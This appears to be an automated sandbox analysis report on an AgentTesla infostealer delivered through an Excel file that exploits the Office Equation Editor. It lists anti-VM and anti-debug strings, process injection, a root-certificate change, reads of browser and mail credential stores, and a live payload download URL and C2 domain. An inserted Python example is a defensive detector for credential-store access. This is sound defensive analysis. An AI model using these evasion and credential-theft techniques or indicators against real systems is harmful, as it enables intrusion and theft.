Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME8
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL8
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 (logged 2 times; 922337203685477 is Int64.MaxValue 100 ns ticks expressed in milliseconds, i.e. TimeSpan.MaxValue, so the thread is parked for an effectively infinite interval rather than a bounded sleep)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\Public\vbc.exe Window / User API: threadDelayed 9689
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2360 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2788 Thread sleep time: -31500s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2800 Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3060 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3060 Thread sleep time: -120000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (logged 5 times)
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWARE8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: Fm%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: QEMU8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWAREHDGm
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMwareHDGm
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware
Source: vbc.exe, 00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: Fm"SOFTWARE\VMware, Inc.\VMware Tools8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: vmware8
Source: vbc.exe, 00000004.00000002.2159285795.0000000002853000.00000004.00000001.sdmp Binary or memory string: VMware HDGm
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe {path}
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000005.00000002.2368808452.00000000013E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation (logged 2 times)
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Users\Public\vbc.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Tries to steal Mail credentials (via file access)
Source: C:\Users\Public\vbc.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (logged 2 times)
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
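The file and registry opens above are the whole of AgentTesla's credential theft as the sandbox sees it: plain reads of browser and mail-client profile stores by a process that is neither the browser nor the mail client. The block below is an added example, not part of this report, that encodes that ownership mismatch as a check over constructed file/registry-open records built from the lines above; the store list and the owner mapping are assumptions.

```python
"""Flag credential-store reads by processes that do not own the store.

Added example, not part of the report. Each profile store has exactly one
legitimate reader; any other image opening it is worth an alert regardless
of the image name. STORE_OWNERS is an assumption; SAMPLE_EVENTS is constructed
from the file/registry opens in this report plus two benign control records.
"""
import ntpath

# lowercase substring identifying the store -> image names allowed to open it (assumption)
STORE_OWNERS = {
    "\\google\\chrome\\user data\\": {"chrome.exe"},
    "\\mozilla\\firefox\\profiles.ini": {"firefox.exe"},
    "\\thunderbird\\profiles.ini": {"thunderbird.exe"},
    "\\windows messaging subsystem\\profiles\\": {"outlook.exe"},
    "\\incredimail\\identities": {"incredimail.exe"},
}


def store_for(target: str):
    """Return (store key, owner set) if target is a known credential store, else None."""
    low = target.lower()
    for needle, owners in STORE_OWNERS.items():
        if needle in low:
            return needle, owners
    return None


def flag_access(events):
    """events: iterable of (image path, opened file or registry path).
    Returns (image, target, store key) for each open by a non-owner process."""
    alerts = []
    for image, target in events:
        hit = store_for(target)
        if hit is None:
            continue
        needle, owners = hit
        if ntpath.basename(image).lower() not in owners:
            alerts.append((image, target, needle))
    return alerts


VBC = r"C:\Users\Public\vbc.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"   # constructed control

SAMPLE_EVENTS = [
    (VBC, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (VBC, r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (VBC, r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (VBC, r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    (VBC, r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (CHROME, r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),  # owner: no alert
    (VBC, r"C:\Windows\System32\drivers\etc\hosts"),                                        # not a store: no alert
]

if __name__ == "__main__":
    for image, target, store in flag_access(SAMPLE_EVENTS):
        print(f"{ntpath.basename(image)} opened {store!r}: {target}")
```

Matching on the store path rather than on a list of stealer names is what keeps the check useful against the next rename of vbc.exe; the price is that backup agents and browser-sync tools need to be added to the owner sets before this goes into an alerting pipeline.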

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 960, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Behavior Graph ID: 339305 Sample: 0AX4532QWSA.xlsx Startdate: 13/01/2021 Architecture: WINDOWS Score: 100
Top-level signatures: Found malware configuration; Antivirus detection for URL or domain; Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros); 14 other signatures
Process tree (numbers in brackets are the graph's per-node counts):
  EXCEL.EXE [37 17] started
  EQNEDT32.EXE [12] started
    contacted: 191.96.149.225, 49167, 80 MAJESTIC-HOSTING-01US Chile
    dropped: C:\Users\user\AppData\Local\...\new[1].exe, PE32
    dropped: C:\Users\Public\vbc.exe, PE32
    signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    vbc.exe started
      signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes
      vbc.exe [6] started
        contacted: gammavilla.org 217.174.152.38, 49168, 49171, 49172 TELEPOINTBG Bulgaria; mail.gammavilla.org
        signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook

Contacted Public IPs

IP              Domain   Country   ASN     ASN Name               Malicious
217.174.152.38  unknown  Bulgaria  31083   TELEPOINTBG            true
191.96.149.225  unknown  Chile     396073  MAJESTIC-HOSTING-01US  true

Contacted Domains

Name                 IP              Active
gammavilla.org       217.174.152.38  true
mail.gammavilla.org  unknown         unknown

Contacted URLs

Name                           Malicious  Antivirus Detection       Reputation
http://191.96.149.225/new.exe  true       Avira URL Cloud: malware  unknown